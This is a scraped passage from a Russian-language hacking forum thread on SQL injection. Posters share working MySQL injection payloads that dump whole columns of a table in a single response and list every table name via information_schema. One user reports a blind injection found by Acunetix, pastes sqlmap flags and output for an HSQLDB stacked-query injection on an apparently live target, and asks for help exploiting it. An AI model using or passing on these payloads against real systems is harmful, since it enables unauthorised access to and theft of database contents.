![]() |
Цитата:
|
Цитата:
https://defcon.ru/web-security/2320/ что бы он не по одной записи "выплевывал" |
Цитата:
п.с может лимит убрать? |
Цитата:
п.с зачем убирать лимит , если https://rdot.org/forum/showthread.php?t=124&page=2 SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o |
Цитата:
|
Цитата:
Код:
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x) - таблицы |
Можно ли мапой посмотреть размер БД,таблиц,колонок ?
|
Цитата:
|
Имелось в виду не количество записей в той или оной таблице , а их вес в B,МB
|
Кто сможет помочь, Акунет нашел скулю слепую.
тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5 Он мне пишет что параметр уязвим. [16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Но потом ничего не находит каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\ Что можно попробовать подскажите пожалуйста. |
| Время: 21:49 |